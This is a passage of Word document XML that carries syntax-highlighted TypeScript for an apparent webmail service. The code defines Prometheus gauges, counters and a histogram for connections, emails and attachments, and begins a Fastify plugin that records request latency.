      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  registers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">register</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Gauge de conexiones WebSocket activas</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> wsConnections </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Gauge</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'webmail6_websocket_connections_active'</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'Conexiones WebSocket activas'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  labelNames</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'user'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  registers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">register</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Gauge de cuentas IMAP conectadas</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> imapConnections </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Gauge</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'webmail6_imap_connections_active'</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'Conexiones IMAP activas por cuenta'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  labelNames</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'account_id'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  registers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">register</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Contador de emails enviados</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> emailsSent </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Counter</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'webmail6_emails_sent_total'</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'Total de emails enviados'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  labelNames</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'account_id'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'status'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  registers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">register</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Contador de emails sincronizados</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> emailsSynced </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Counter</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'webmail6_emails_synced_total'</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'Emails sincronizados desde IMAP'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  labelNames</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'account_id'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'folder'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  registers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">register</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Histograma de tamaño de adjuntos</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> attachmentSize </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Histogram</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'webmail6_attachment_size_bytes'</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'Tamaño de adjuntos procesados'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  buckets</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DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1048576</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">10485760</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">52428800</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">104857600</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// 1KB, 1MB, 10MB, 50MB, 100MB</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  registers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">register</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 client }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/api/src/plugins/metrics.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { FastifyInstance } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'fastify'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> httpDuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> httpRequests } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'../config/metrics.js'</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metricsPlugin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> FastifyInstance) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Hook para medir latencia de cada request</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">addHook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'onResponse'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> reply)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route </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">routerPath</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> labels </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request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">method</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      status_code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> reply</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">statusCode</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httpDuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">observe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(labels</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
